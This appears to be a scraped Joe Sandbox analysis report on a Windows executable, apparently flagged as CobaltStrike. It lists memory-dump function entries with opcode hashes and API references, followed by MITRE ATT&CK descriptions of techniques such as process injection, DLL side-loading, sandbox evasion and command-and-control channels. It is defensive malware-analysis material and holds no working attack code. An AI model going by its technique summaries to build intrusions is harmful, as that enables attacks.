Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704

Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Overflow range error (OVERFLOW), xrefs: 00401D00
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704

Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Total loss of significance (TLOSS), xrefs: 00401D20
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704

Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Argument domain error (DOMAIN), xrefs: 00401CE0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Partial loss of significance (PLOSS), xrefs: 00401CF0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Argument singularity (SIGN), xrefs: 00401C78
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704

Function 001A10C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 001A116A

Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235

free.LIBCMT ref: 001A12F3
free.LIBCMT ref: 001A12FD
free.LIBCMT ref: 001A130F

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00

Function 00661CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 00661D6A

Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35

free.LIBCMT ref: 00661EF3
free.LIBCMT ref: 00661EFD
free.LIBCMT ref: 00661F0F

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00

Function 001BA144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001BA178

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

free.LIBCMT ref: 001BA2BF
free.LIBCMT ref: 001BA323
free.LIBCMT ref: 001BA32F

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701

Function 0067AD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0067AD78

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

free.LIBCMT ref: 0067AEBF
free.LIBCMT ref: 0067AF23
free.LIBCMT ref: 0067AF2F

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706

Function 001A3700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001A3763

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700

Function 00664300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00664363

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700

Function 00671038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 00679170: GetCurrentProcess.KERNEL32 ref: 00679188

GetLastError.KERNEL32 ref: 006710A7
malloc.LIBCMT ref: 0067113C
free.LIBCMT ref: 00671185
GetLastError.KERNEL32 ref: 006711B5

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ErrorLast$CurrentProcessfreemalloc
String ID:
API String ID: 1397824077-0
Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report P3KxDOMmD3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

